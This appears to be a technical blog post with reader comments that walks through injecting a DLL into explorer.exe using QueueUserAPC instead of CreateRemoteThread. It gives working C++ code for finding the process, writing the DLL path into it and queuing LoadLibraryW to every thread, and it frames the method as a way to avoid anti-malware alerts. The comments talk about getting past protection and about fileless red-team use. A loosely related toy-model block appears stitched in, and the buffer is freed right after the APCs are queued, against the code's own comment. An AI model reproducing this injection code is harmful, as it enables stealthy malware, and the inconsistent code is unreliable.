Injecting a DLL without a Remote Thread

March 14, 2017


A well-known technique for injecting a DLL into another process uses the CreateRemoteThread(Ex) function to create a thread in the target process whose start routine is LoadLibraryA or LoadLibraryW. This works because these functions have the same signature (at the binary level) as a thread function. Before calling CreateRemoteThread, the caller uses VirtualAllocEx to allocate some memory in the target to hold the path to the DLL. This technique is simple and reliable, but has a couple of drawbacks:

  1. The target process must be opened with a relatively broad access mask that includes PROCESS_CREATE_THREAD.
  2. Anti-malware agents typically watch CreateRemoteThread attempts closely and will be alerted to them, since most processes should not need such an operation. The canonical scenario for CreateRemoteThread is for a debugger to inject a thread into its debuggee and then trigger a breakpoint, forcing a break-in into the process.

Another technique, which injects a DLL without creating any remote thread, is to use an Asynchronous Procedure Call (APC). An APC is an object that wraps a function and is targeted at a particular thread. If we can somehow attach an APC to a thread running in the target process, we may be able to “force” that thread to load our DLL. There’s one snag with this approach, which we’ll get to in a moment.

Let’s say we want to inject our DLL into Explorer.exe, since it’s likely to be running, and code running inside Explorer is somewhat “trusted” by users. First, we need to locate Explorer and then decide which thread should receive our APC. We could pick a random thread inside Explorer, but it is better to queue the APC to all of its threads. Why? Because a user mode APC (the only kind we can queue from user mode) cannot force the target thread to execute it (that’s the “snag”). For a thread to execute its APCs, it must enter an “alertable” state, which can be achieved with several functions: SleepEx, WaitForSingleObjectEx, WaitForMultipleObjectsEx and MsgWaitForMultipleObjectsEx. The wait in each of these functions can be configured to be alertable, so that pending APCs are able to run.
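The alertable-state rule can be illustrated without touching another process. What follows is a toy model in portable C++, not the Windows implementation: ToyThread, queue_apc, plain_wait and alertable_wait are hypothetical names made up for this sketch. It only shows that a queued callback sits idle until the owning thread chooses to wait alertably, at which point pending callbacks run in the order they were queued.

```cpp
#include <cstddef>
#include <deque>
#include <functional>
#include <utility>

// Toy model of a per-thread user mode APC queue.
// All names here are hypothetical; this is not a Windows API.
class ToyThread {
public:
    // Plays the role of QueueUserAPC: the callback is recorded, never run here.
    void queue_apc(std::function<void()> fn) { pending_.push_back(std::move(fn)); }

    // Plays the role of a non-alertable wait such as SleepEx(ms, FALSE):
    // pending callbacks are left untouched.
    void plain_wait() {}

    // Plays the role of an alertable wait such as SleepEx(ms, TRUE):
    // drains the queue in FIFO order and returns how many callbacks ran.
    std::size_t alertable_wait() {
        std::size_t ran = 0;
        while (!pending_.empty()) {
            auto fn = std::move(pending_.front());
            pending_.pop_front();
            fn();
            ++ran;
        }
        return ran;
    }

    std::size_t pending() const { return pending_.size(); }

private:
    std::deque<std::function<void()>> pending_;
};

// Returns true when the queued callback ran only at the alertable wait.
bool demo() {
    ToyThread t;
    int loaded = 0;
    t.queue_apc([&loaded] { ++loaded; });
    t.plain_wait();                        // nothing happens yet
    bool idle = (loaded == 0 && t.pending() == 1);
    t.alertable_wait();                    // now the callback runs
    return idle && loaded == 1 && t.pending() == 0;
}
```

In the model, as on Windows, the code that queues the callback has no say in when it runs; that decision belongs entirely to the target thread.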

Let’s start by searching for a target process given its EXE name and getting back its ID and a list of threads:

bool FindProcess(PCWSTR exeName, DWORD& pid, vector<DWORD>& tids) {
    auto hSnapshot = ::CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS | TH32CS_SNAPTHREAD, 0);
    if (hSnapshot == INVALID_HANDLE_VALUE)
        return false;

    pid = 0;

    PROCESSENTRY32 pe = { sizeof(pe) };
    if (::Process32First(hSnapshot, &pe)) {
        do {
            if (_wcsicmp(pe.szExeFile, exeName) == 0) {
                pid = pe.th32ProcessID;
                // The snapshot holds the threads of all processes; keep only ours
                THREADENTRY32 te = { sizeof(te) };
                if (::Thread32First(hSnapshot, &te)) {
                    do {
                        if (te.th32OwnerProcessID == pid) {
                            tids.push_back(te.th32ThreadID);
                        }
                    } while (::Thread32Next(hSnapshot, &te));
                }
                break;
            }
        } while (::Process32Next(hSnapshot, &pe));
    }

    ::CloseHandle(hSnapshot);
    return pid > 0 && !tids.empty();
}

The function uses the toolhelp functions to enumerate processes and threads, returning a process ID and a vector of thread IDs.

Now that we have a process and its threads, we can try to queue an APC to each thread using QueueUserAPC. The first step is opening a process handle capable of writing to the target process address space:

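DWORD pid;
vector<DWORD> tids;
if (FindProcess(L"explorer.exe", pid, tids)) {
    // Enough access to allocate and write memory in the target, nothing more
    HANDLE hProcess = ::OpenProcess(PROCESS_VM_WRITE | PROCESS_VM_OPERATION, FALSE, pid);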

Notice that the PROCESS_CREATE_THREAD access right is not required. If the handle comes back valid, we can move on to the real work. Next, we allocate a buffer inside the process and copy our DLL’s full path into the buffer:

auto p = ::VirtualAllocEx(hProcess, nullptr, 1 << 12, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
wchar_t buffer[] = L"g:\\temp\\MyLibrary.Dll";
::WriteProcessMemory(hProcess, p, buffer, sizeof(buffer), nullptr);
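One detail worth checking when adapting the snippet above: sizeof(buffer) works because buffer is an array, so it yields the size in bytes including the terminating null. If the path lives in a std::wstring instead, the byte count has to be computed by hand. A small sketch, where bytes_to_copy is a hypothetical helper and not part of any Windows API:

```cpp
#include <cstddef>
#include <string>

// Hypothetical helper: number of bytes to copy for a wide-character path,
// including the null terminator that LoadLibraryW needs to find the end.
std::size_t bytes_to_copy(const std::wstring& path) {
    return (path.size() + 1) * sizeof(wchar_t);
}
```

With such a helper, the write would pass path.c_str() as the source and bytes_to_copy(path) as the size, since c_str() is guaranteed to be null-terminated.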

Now we can loop over all the threads, obtain a handle for each and queue an APC:

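    for (const auto& tid : tids) {
        HANDLE hThread = ::OpenThread(THREAD_SET_CONTEXT, FALSE, tid);
        if (hThread) {
            ::QueueUserAPC((PAPCFUNC)::GetProcAddress(GetModuleHandle(L"kernel32"), "LoadLibraryW"), hThread, (ULONG_PTR)p);
        }
    }
    // MEM_RELEASE cannot be combined with MEM_DECOMMIT. Free the buffer only once
    // the DLL has loaded, because a pending APC still reads the path from it.
    ::VirtualFreeEx(hProcess, p, 0, MEM_RELEASE);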

Of course, we should also close each thread handle and, finally, the process handle.

We target the APC at the LoadLibraryW function because, again, its prototype is almost the same as that of an APC function. The only real difference is that an APC function does not return anything, but we don’t care. Once our DLL loads, its DllMain can do anything, such as create a local thread and do whatever work we want inside Explorer.

Targeting the APC to all threads increases the chance of the DLL loading, because it’s likely that some thread will enter an alertable wait state. If several threads end up running the APC, the extra LoadLibraryW calls only increment the reference count of the already loaded DLL, so there’s no harm in that.

(Screenshot: my DLL loaded inside Explorer.exe.)



  1. Michael Grabelkovsky, March 20, 2017 at 10:51

    Really interesting.

    But this way it is impossible to get past anti-malware protection if you want to instrument, for example, Services.exe.

    I’ve used a kernel-based instrumentation technique and found a way to get past anti-malware protection too. 🙂
    See example:

  2. arekfurt, April 10, 2017 at 04:24

    This is really, really interesting to someone (ie. myself) who is trying to deepen their understanding of how inter-process DLL injection can occur in Windows without using CreateRemoteThread. The step-by-step analysis with example code is especially helpful. Thanks.

    One question, if you happen across this comment: other uses of QueueUserAPC I’ve seen to this point have required that a new process be started right off the bat, with the QueueUserAPC call then being used in a kind of process hollowing approach. (Similar to what many versions of Hancitor malware do with process hollowing, if memory serves.) This doesn’t. Does that fact have anything to do with the fact that when you allocate the buffer inside the target process you name a DLL file that’s on disk as opposed to copying in-memory code from your source process to the buffer? To put that in other, more practical terms, could this approach be altered to use a DLL you want to inject without actually needing to download a file to disk first?

    A DLL injection method that doesn’t require using CreateRemoteThread, allows injection into an existing process, and doesn’t require writing anything to disk would be a very nice addition to a pen test/red teaming toolkit. 🙂